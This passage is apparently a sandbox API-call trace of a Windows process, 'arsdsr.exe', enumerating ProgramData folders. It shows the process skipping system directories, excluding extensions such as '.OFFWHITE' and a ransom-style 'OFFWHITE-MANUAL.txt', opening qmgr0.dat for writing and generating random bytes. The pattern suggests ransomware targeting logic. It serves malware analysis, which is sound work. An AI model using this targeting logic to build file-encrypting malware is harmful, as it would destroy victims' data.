ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4c004a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0144.209] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.209] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50ea0e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50ea0e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50ea0e30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="8.0", cAlternateFileName="")) returned 0 [0144.210] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.210] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2=".") returned 1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="..") returned 1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="...") returned 1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="windows") returned -1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="$recycle.bin") returned 1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="rsa") returned -1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="ntuser.dat") returned -1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="programdata") returned -1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="appdata") returned 1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="program files") returned -1 [0144.210] lstrcmpiW (lpString1="NetFramework", lpString2="program files (x86)") returned -1 [0144.210] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.210] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="NetFramework" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework") returned="C:/Users\\All Users\\Microsoft\\NetFramework" [0144.210] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\") returned="C:/Users\\All Users\\Microsoft\\NetFramework\\" [0144.210] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\NetFramework\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\") returned="C:/Users\\All Users\\Microsoft\\NetFramework\\" [0144.210] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\*.*") returned="C:/Users\\All Users\\Microsoft\\NetFramework\\*.*" [0144.210] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\NetFramework\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.213] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.213] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.213] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.213] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.213] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2=".") returned 1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="..") returned 1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="...") returned 1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="windows") returned -1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="$recycle.bin") returned 1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="rsa") returned -1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="ntuser.dat") returned -1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="programdata") returned -1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="appdata") returned 1 [0144.213] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="program files") returned -1 [0144.214] lstrcmpiW (lpString1="BreadcrumbStore", lpString2="program files (x86)") returned -1 [0144.214] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\NetFramework\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\") returned="C:/Users\\All Users\\Microsoft\\NetFramework\\" [0144.214] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\", lpString2="BreadcrumbStore" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore") returned="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore" [0144.214] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\") returned="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\" [0144.214] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\") returned="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\" [0144.214] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*") returned="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*" [0144.214] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\NetFramework\\BreadcrumbStore\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.214] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.214] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.214] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.214] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.214] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c005a, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0144.214] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.214] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x56ac2f60, ftCreationTime.dwHighDateTime=0x1d2e676, ftLastAccessTime.dwLowDateTime=0x56ac2f60, ftLastAccessTime.dwHighDateTime=0x1d2e676, ftLastWriteTime.dwLowDateTime=0x56ac2f60, ftLastWriteTime.dwHighDateTime=0x1d2e676, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="BreadcrumbStore", cAlternateFileName="BREADC~1")) returned 0 [0144.214] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0144.215] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Network", cAlternateFileName="")) returned 1 [0144.215] lstrcmpiW (lpString1="Network", lpString2=".") returned 1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="..") returned 1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="...") returned 1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="windows") returned -1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="$recycle.bin") returned 1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="rsa") returned -1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="ntuser.dat") returned -1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="programdata") returned -1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="appdata") returned 1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="program files") returned -1 [0144.215] lstrcmpiW (lpString1="Network", lpString2="program files (x86)") returned -1 [0144.215] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0144.215] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Network" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network") returned="C:/Users\\All Users\\Microsoft\\Network" [0144.215] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\") returned="C:/Users\\All Users\\Microsoft\\Network\\" [0144.215] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Network\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\") returned="C:/Users\\All Users\\Microsoft\\Network\\" [0144.215] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\*.*") returned="C:/Users\\All Users\\Microsoft\\Network\\*.*" [0144.215] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Network\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0144.216] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.216] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd9b5b52, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0144.216] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.216] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.216] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2=".") returned 1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="..") returned 1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="...") returned 1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="windows") returned -1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="$recycle.bin") returned 1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="rsa") returned -1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="ntuser.dat") returned -1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="programdata") returned -1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="appdata") returned 1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="program files") returned -1 [0144.216] lstrcmpiW (lpString1="Connections", lpString2="program files (x86)") returned -1 [0144.216] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Network\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\") returned="C:/Users\\All Users\\Microsoft\\Network\\" [0144.216] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\", lpString2="Connections" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Connections") returned="C:/Users\\All Users\\Microsoft\\Network\\Connections" [0144.216] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Connections", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Connections\\") returned="C:/Users\\All Users\\Microsoft\\Network\\Connections\\" [0144.216] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Network\\Connections\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Connections\\") returned="C:/Users\\All Users\\Microsoft\\Network\\Connections\\" [0144.216] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Connections\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Connections\\*.*") returned="C:/Users\\All Users\\Microsoft\\Network\\Connections\\*.*" [0144.216] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Network\\Connections\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.217] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.217] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.217] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.217] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.217] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xa68726b4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0144.217] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0144.217] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2=".") returned 1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="..") returned 1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="...") returned 1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="windows") returned -1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="$recycle.bin") returned 1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="rsa") returned -1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="ntuser.dat") returned -1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="programdata") returned -1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="appdata") returned 1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="program files") returned -1 [0144.217] lstrcmpiW (lpString1="Downloader", lpString2="program files (x86)") returned -1 [0144.217] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Network\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\") returned="C:/Users\\All Users\\Microsoft\\Network\\" [0144.218] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\", lpString2="Downloader" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader" [0144.218] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\" [0144.218] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\" [0144.218] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\*.*") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\*.*" [0144.218] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0144.218] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0144.218] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7606ea15, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0144.218] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0144.218] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0144.218] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xe0118910, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0x520050, dwReserved1=0x295e370, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2=".") returned 1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2="..") returned 1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2="...") returned 1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2="windows") returned -1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2="$recycle.bin") returned 1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2="rsa") returned -1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2="ntuser.dat") returned 1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2="programdata") returned 1 [0144.218] lstrcmpiW (lpString1="qmgr0.dat", lpString2="appdata") returned 1 [0144.219] lstrcmpiW (lpString1="qmgr0.dat", lpString2="program files") returned 1 [0144.219] lstrcmpiW (lpString1="qmgr0.dat", lpString2="program files (x86)") returned 1 [0144.219] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\" [0144.220] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\", lpString2="qmgr0.dat" | out: lpString1="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat") returned="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" [0144.220] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.220] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.220] PathFindExtensionW (pszPath="qmgr0.dat") returned=".dat" [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".exe") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".log") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".cab") returned 1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".cmd") returned 1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".com") returned 1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".cpl") returned 1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".url") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".ttf") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".mp3") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".pif") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".mp4") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".OFFWHITE") returned -1 [0144.221] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0144.221] lstrcmpiW (lpString1="qmgr0.dat", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.221] GetProcessHeap () returned 0x500000 [0144.221] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e990 [0144.221] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0144.222] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x295d860 | out: lpFileSize=0x295d860*=4194304) returned 1 [0144.222] GetProcessHeap () returned 0x500000 [0144.222] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.222] GetProcessHeap () returned 0x500000 [0144.222] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.222] GetProcessHeap () returned 0x500000 [0144.222] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.222] GetProcessHeap () returned 0x500000 [0144.222] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.222] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.222] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.222] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.222] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.222] lstrcmpiW 